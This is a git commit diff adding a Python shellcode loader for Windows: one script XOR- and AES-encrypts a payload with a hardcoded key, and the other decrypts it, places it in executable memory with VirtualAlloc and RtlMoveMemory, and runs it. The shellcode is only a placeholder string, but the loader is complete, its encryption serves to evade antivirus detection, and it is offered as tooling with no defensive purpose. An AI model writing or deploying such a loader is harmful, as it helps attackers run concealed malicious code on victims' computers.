first commit

HZzz2 · HZzz2 · commit adb427c147e0 · 2022-06-06T21:16:37.000+08:00
diff --git a/jiami.py b/jiami.py
@@ -0,0 +1,32 @@
+import base64
+from operator import xor
+from Crypto.Cipher import AES
+
+def add_to_16(s):
+        while len(s) % 16 != 0:
+            s += '\0'
+        return str.encode(s)  # 返回bytes
+
+def aes_jiami(text):
+    # 密钥长度必须为16、24或32位，分别对应AES-128、AES-192和AES-256
+    key = 'LeslieCheungKwok'
+    aes = AES.new(add_to_16(key), AES.MODE_ECB)
+    encrypted_text = str(base64.encodebytes(aes.encrypt(add_to_16(text))), encoding='utf8').replace('\n', '')
+    return encrypted_text
+
+def xor_jiami(s,key):
+    xor_s = ''
+    for i in s:
+        xor_s += chr(ord(i) ^ key)
+    return xor_s
+
+
+if __name__=='__main__':
+    sc = 'payload'
+    with open('./aes-xor.txt','w') as f:
+        f.write(aes_jiami(xor_jiami(sc,35)))
+    
+
+
+
+
diff --git a/main.py b/main.py
@@ -0,0 +1,44 @@
+import base64
+import ctypes
+
+from Crypto.Cipher import AES
+
+kernel32 = ctypes.windll.kernel32
+
+def aes_jiemi(s):
+    cipher = AES.new(b'LeslieCheungKwok', AES.MODE_ECB)
+    return cipher.decrypt(base64.decodebytes(bytes(s, encoding='utf8'))).rstrip(b'\0').decode("utf8")
+
+def xor_jiemi(s,key):
+    xor_s = ''
+    for i in s:
+        xor_s += chr(ord(i) ^ key)
+    return xor_s
+
+def write_memory(buf):
+    length = len(buf)
+
+    kernel32.VirtualAlloc.restype = ctypes.c_void_p
+    ptr = kernel32.VirtualAlloc(None, length, 0x3000, 0x40)
+
+    kernel32.RtlMoveMemory.argtypes = (
+        ctypes.c_void_p,
+        ctypes.c_void_p,
+        ctypes.c_size_t)
+    kernel32.RtlMoveMemory(ptr, buf, length)
+    return ptr
+
+
+def run(shellcode):
+    buf = ctypes.create_string_buffer(shellcode)
+    ptr = write_memory(buf)
+    shell_func = ctypes.cast(ptr, ctypes.CFUNCTYPE(None))
+    shell_func()
+
+
+
+if __name__ == '__main__':
+    jiami_sc = 'payload'
+    sc = xor_jiemi(aes_jiemi(jiami_sc),35)
+    shde = base64.b64decode(sc)
+    run(shde)
diff --git a/setting.ico b/setting.ico
